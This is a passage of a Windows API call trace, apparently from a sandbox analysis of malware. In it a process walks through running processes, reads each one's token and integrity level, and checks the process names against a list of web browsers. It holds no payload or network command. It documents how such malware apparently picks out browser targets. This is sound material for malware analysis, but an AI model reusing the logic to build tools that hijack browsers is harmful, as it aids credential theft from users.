[4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.009] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.009] CloseHandle (hObject=0xb8) returned 1 [0225.009] CloseHandle (hObject=0xb4) returned 1 [0225.010] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0225.010] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0225.010] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0225.010] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0225.010] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0225.010] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0225.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0225.010] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.010] GetLastError () returned 0x7a [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.010] CloseHandle (hObject=0xb8) returned 1 [0225.010] CloseHandle (hObject=0xb4) returned 1 [0225.010] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0225.010] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165ea0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.010] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.010] GetLastError () returned 0x7a [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.010] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.010] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.010] CloseHandle (hObject=0xb8) returned 1 [0225.010] CloseHandle (hObject=0xb4) returned 1 [0225.010] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0225.010] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0225.010] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0225.010] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0225.010] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0225.010] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0225.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0225.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0225.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0225.010] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.010] GetLastError () returned 0x7a [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.010] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.010] CloseHandle (hObject=0xb8) returned 1 [0225.011] CloseHandle (hObject=0xb4) returned 1 [0225.011] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0225.011] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1664e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.011] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.011] GetLastError () returned 0x7a [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.011] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.011] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.011] CloseHandle (hObject=0xb8) returned 1 [0225.011] CloseHandle (hObject=0xb4) returned 1 [0225.011] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0225.011] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0225.011] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0225.011] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0225.011] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0225.011] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0225.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0225.011] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.011] GetLastError () returned 0x7a [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.011] CloseHandle (hObject=0xb8) returned 1 [0225.011] CloseHandle (hObject=0xb4) returned 1 [0225.011] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0225.011] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1669e0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.011] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.011] GetLastError () returned 0x7a [0225.011] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.011] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.011] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.011] CloseHandle (hObject=0xb8) returned 1 [0225.011] CloseHandle (hObject=0xb4) returned 1 [0225.012] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0225.012] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0225.012] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0225.012] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0225.012] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0225.012] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0225.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0225.012] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.012] GetLastError () returned 0x7a [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.012] CloseHandle (hObject=0xb8) returned 1 [0225.012] CloseHandle (hObject=0xb4) returned 1 [0225.012] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0225.012] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166af8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.012] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.012] GetLastError () returned 0x7a [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.012] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.012] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.012] CloseHandle (hObject=0xb8) returned 1 [0225.012] CloseHandle (hObject=0xb4) returned 1 [0225.012] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0225.012] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0225.012] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0225.012] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0225.012] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0225.012] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0225.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0225.012] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.012] GetLastError () returned 0x7a [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.012] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.012] CloseHandle (hObject=0xb8) returned 1 [0225.012] CloseHandle (hObject=0xb4) returned 1 [0225.012] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0225.013] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166c10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.013] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.013] GetLastError () returned 0x7a [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.013] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.013] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.013] CloseHandle (hObject=0xb8) returned 1 [0225.013] CloseHandle (hObject=0xb4) returned 1 [0225.013] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0225.013] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0225.013] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0225.013] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0225.013] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0225.013] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0225.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0225.013] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.013] GetLastError () returned 0x7a [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.013] CloseHandle (hObject=0xb8) returned 1 [0225.013] CloseHandle (hObject=0xb4) returned 1 [0225.013] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0225.013] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166d50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.013] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.013] GetLastError () returned 0x7a [0225.013] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.013] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.013] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.013] CloseHandle (hObject=0xb8) returned 1 [0225.013] CloseHandle (hObject=0xb4) returned 1 [0225.013] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0225.013] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0225.013] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0225.013] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0225.013] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0225.014] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0225.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0225.014] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.014] GetLastError () returned 0x7a [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.014] CloseHandle (hObject=0xb8) returned 1 [0225.014] CloseHandle (hObject=0xb4) returned 1 [0225.014] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0225.014] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166e70, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.014] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.014] GetLastError () returned 0x7a [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.014] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.014] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.014] CloseHandle (hObject=0xb8) returned 1 [0225.014] CloseHandle (hObject=0xb4) returned 1 [0225.014] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0225.014] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0225.014] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0225.014] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0225.014] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0225.014] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0225.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0225.014] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, 